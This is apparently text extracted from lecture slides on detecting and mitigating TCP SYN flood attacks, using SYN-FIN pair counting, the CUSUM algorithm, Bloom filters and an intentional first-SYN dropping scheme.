◼ also it classifies addresses as likely to be spoofed or
legitimate…
Problems with previous solutions

◼ Solutions such as SYN cookies, SYN cache,


SYN Defender/SYN proxying, SYN kill
❑ Knew nothing of source
❑ Relied on “costly IP traceback”
❑ These solutions are “statefull” so they can be
overwhelmed by SYN attacks
◼ 14,000SYN/sec can overload
Flood Detection System (FDS)

◼ Stateless, simple, edge (leaf) routers


◼ Utilize SYN-FIN pair behavior
◼ Include (SYNACK - FIN) so client or server
◼ However, RST violates SYN-FIN behavior
◼ Placement: First/last mile leaf routers
❑ First mile – detect large DoS attacker
❑ Last mile – detect DDoS attacks that first mile
would miss
SYN – FIN Behavior
SYN – FIN Behavior

◼ Generally every SYN has a FIN


What to do about “RST”
◼ We can’t tell if RST is active or passive
◼ Consider 75% active
◼ Active represents a SYN passive does not
◼ Should balance out to be background noise

RED – SYN
BLUE- FIN
BLACK – RST
Statistical Attack Detection

◼ There are very many SYN’s necessary to


accomplish a DoS attack
◼ At least 500 SYN/sec

◼ 1400 SYN/sec can overwhelm firewall

◼ 300,000 SYNs necessary to shut down server


for 10 minutes
◼ So SYN-FIN ratio should be very skewed

during an attack
False Positive Possibilities

◼ Many new online users with long sessions


❑ More SYNs coming in than FINs
◼ A major server is down which would result
in 3 SYNs to a FIN
❑ Because clients would retransmit the SYN
CUSUM Algorithm

◼ Finding average number of FINs over a


time period, and looking for a time period
and testing for statistical homogeneity .
If there are significant changes to this,
then find when they changed.
Detection

◼ The algorithm will result in zero for all


normal activity and cumulatively track (i.e.
CUSUM = “cumulative sum”)
Detection
◼ The internet can be quite dynamic and too
complicated for a parametric estimation, so
we use sequential testing which requires much
less computation
◼ Two aspects of detection:
❑ 1) False alarm time: the time without attacks
between unique false alarms
❑ 2) Detection time: the detection delay after the
attack starts.

◼ The goal is to minimize the second and


maximize the first. However, the conflict and
require trade offs
Performance Trends SYN-FIN
Detecting SYN-Flood
using Bloom Filters

SFD-BF
Idea

◼ Improving SFD: using Bloom Filter match FINs


against SYN with low error probability
❑ For each TCP packets we are interested in this 4-tuple:
(source and destination IP, source and destination Port) ➔
Matching FIN against SYNs on this 4-tuple
Hash Function

Input : x
• Output : H[x]
• Properties
– Each value of x maps to a value of H[x]
– Typically: Size of (x) >> Size of (H[x])
• Implementation
– Hash Function
XOR of bits, Shifting, rotates ..

Operating System
Concepts
Bloom-Filter (BF)

◼ Bloom Filter uses k hash functions

Operating System
Concepts
Bloom-Filter (BF)

Operating System
Concepts
Querying a Bloom Filter

Operating System
Concepts
Querying a Bloom Filter

Operating System
Concepts
Optimal Parameters of a Bloom filter

• n : number of Item to be stored


• k : number of hash functions
• m : the size of the bit-array
(memory)
• The false positive probability
f = (½)^k
• The optimal value of hash
functions, k,is:
k = ln2 × m/n = 0.693 × m/n

Operating System
Concepts
Counting Bloom Filters

◼ Extension: the array of m bits becomes the array of


m small counters.
❑ When insert or delete a value x from BF, we simply increase
or decrease the corresponding counter

Operating System
Concepts
Counting Bloom Filters

❑ For small false positive probability, usually set


m/n=16➔ FSP is at most 0,000459
❑ Also give counters of 8 bits.
❑ When the number of counters are being used >=
m/2 ➔ reset BF to improve for smaller FSP

Operating System
Concepts
SFD-Method

1- Classification of packets
2-Computing the # of SYN and FIN packets
going through
3-Using algorithm CUSUM to analyze the (SYN-
FIN) pair behaviour

Operating System
Concepts
SFD-BF Method

◼ Improvement on previous SFD:


❑ Compute the difference between #SYN and #FIN

when the packets are matched on the 4-tuple:


◼ When a SYN packet comes, determine the
corresponding 4-tuple and insert this into BF.
Increase the counter specified by this 4-tuple.
◼ When a FIN/RST packet comes: determines the
4-tuples and find it’s hash in BF to decrease the
corresponding counter
Result
Result
Intentional Dropping Scheme
for SYN Flooding Mitigation
Idea

❑ Normally, if it does not receive a SYN-ACK after


sending a SYN for a certain time a client machine
then would resend another SYN until it gets
connected to the wanted server.
❑ The idea of this method is to drop all the first
SYN from all the source machine, which would help
to reduce SYN flood which is usually first SYNs
with spoofed addresses
Method

◼ The solution is to propose using 3 different BFs:


❑ BF1: stores the 4-tuple address of the first SYN

coming from a given source


❑ BF2: stores the 4-tupple of all SYNs, with which
the 3-way handshake is already completed
❑ BF-3: Store the 4-tupple of other SYNs.

Operating System
Concepts
Method

Once a SYN arrives, its 4-tuple address is checked


against the 3 BFs, where occurs 1 of the 3 following
cases:
◼ 1. Not in any BF➔ This is the first SYN then will
be dropped, also insert the 4-tuple into BF1
◼ 2. If found in BF-1➔ this is a second SYN we
just move the 4-tuple from BF1 to BF3
◼ 3. If in BF-2 ➔ Let it go through.

◼ 4. If in BF-3 ➔ let it goes through with


probability p=1/n, where n is the value of
corresponding counter in BF-3
Method

When an ACK comes, its 4-tupple address is checked


against the BFs, which may results in 1 of 3 following
cases”
1. Not in any BF ➔ drop the packet
2. If it matches one in BF-2 ➔ let it through
3. If in BF-3 ➔ the connection is completed ➔ move
the 4-tuple address from BF3 to BF-2
Result

◼ First SYN from any source will be dropped


◼ The second SYN from the same source will go
through
◼ If this same source continue sending SYNs, the
probability that the SYN numbered n is allowed
to go through is 1/n
➔ Thus, the SYN flood caused by an attacking
source will be mitigated.

You might also like